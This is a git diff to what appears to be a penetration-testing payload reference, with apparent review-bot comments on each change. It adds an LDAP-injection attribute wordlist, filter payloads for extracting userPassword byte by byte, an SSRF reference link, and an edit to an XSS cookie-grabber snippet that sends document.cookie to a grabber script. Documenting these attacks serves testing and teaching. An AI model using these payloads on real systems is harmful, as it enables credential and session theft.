diff --git a/LDAP injection/Intruders/LDAP_attributes.txt b/LDAP injection/Intruders/LDAP_attributes.txt
new file mode 100644
index 0000000..472a4ec
--- /dev/null
+++ b/LDAP injection/Intruders/LDAP_attributes.txt
@@ -0,0 +1,9 @@
+userPassword
+surname
+name
+cn
+sn
+objectClass
+mail
+givenName
+commonName
\ No newline at end of file
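Review bot: the new LDAP_attributes.txt ends without a trailing newline (the `\ No newline at end of file` marker after `commonName`), so any tool that appends to or concatenates this wordlist will fuse the last entry with whatever follows; end the file with a newline. The same nine names are also pasted into the README in this commit, which leaves two copies to keep in sync, so consider having the README reference the file instead. `surname`/`sn` and `commonName`/`cn` are alias pairs in common directory schemas (OpenLDAP's core schema, for example), so a one-line note that the list is not nine distinct attributes would help.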
diff --git a/LDAP injection/README.md b/LDAP injection/README.md
index 588ddb0..8e33621 100644
--- a/LDAP injection/README.md
+++ b/LDAP injection/README.md
@@ -66,7 +66,37 @@ We can extract using a bypass login
(&(sn=administrator)(password=MYKE)) : OK
```
+## Defaults attributes
+
+Can be used in an injection like `*)(ATTRIBUTE_HERE=*`
+
+```bash
+userPassword
+surname
+name
+cn
+sn
+objectClass
+mail
+givenName
+commonName
+```
+
+## Exploiting userPassword attribute
+
+userPassword’ attribute in not a string like the ‘cn’ attribute for example but it’s an OCTET STRING
+In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18).
+
+> octetStringOrderingMatch (OID 2.5.13.18): An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit.
+
+```bash
+userPassword:2.5.13.18:=\xx (\xx is a byte)
+userPassword:2.5.13.18:=\xx\xx
+userPassword:2.5.13.18:=\xx\xx\xx
+```
+
## Thanks to
* [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
* [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
+* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/)
\ No newline at end of file
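Review bot: the first sentence under "Exploiting userPassword attribute" has an unbalanced quote and a typo (`userPassword’ attribute in not a string`), and it is followed by the next sentence with no blank line, so Markdown renders both as one run-on paragraph. Suggested wording: "The `userPassword` attribute is not a string like `cn`; it is an OCTET STRING." The sentence after it names octetStringOrderingMatch (OID 2.5.13.18) without saying that this is the ordering rule applied to octet string values, which is the link a reader needs before the quoted definition. Smaller points: the heading should read "Default attributes", both new fences are tagged `bash` although neither contains shell commands, the `\xx` placeholder is explained only on the first of the three filter lines, and README.md still ends without a newline. Since the section documents reading a password attribute through a filter, a closing line on the defensive side (escape filter input per RFC 4515 and restrict access to `userPassword` in the directory ACLs) would round it out.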
diff --git a/SSRF injection/README.md b/SSRF injection/README.md
index bbd3b8a..c49084d 100644
--- a/SSRF injection/README.md
+++ b/SSRF injection/README.md
@@ -464,3 +464,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
* [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)
* [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
* [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
+* [Hacker101 SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8)
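Review bot: the added reference is a YouTube video, but the link text "Hacker101 SSRF" does not say so, while the neighbouring entries are written articles; label it, for example "Hacker101 SSRF (video)", so readers know what they are opening.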
diff --git a/XSS injection/README.md b/XSS injection/README.md
index 3f94d46..f5c7b15 100644
--- a/XSS injection/README.md
+++ b/XSS injection/README.md
@@ -19,7 +19,9 @@ Cookie grabber for XSS
```php
document.location='http://localhost/XSS/grabber.php?c=' + document.cookie
+
+or
+
// Write the cookie in a file
$cookie = $_GET['c'];
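Review bot: the added `or` sits as bare text inside the ```php fence, so it is neither valid PHP nor valid JavaScript and will break the snippet for anyone who copies the block whole; make it a comment or close the fence and put the word in prose. From the lines visible here it also reads as misleading: the first line is JavaScript that requests `grabber.php?c=` and the code after it is PHP that reads `$_GET['c']`, which looks like the two halves of one setup rather than alternatives. Splitting them into a `js` fence and a `php` fence, each with a one-line caption, would make that clear.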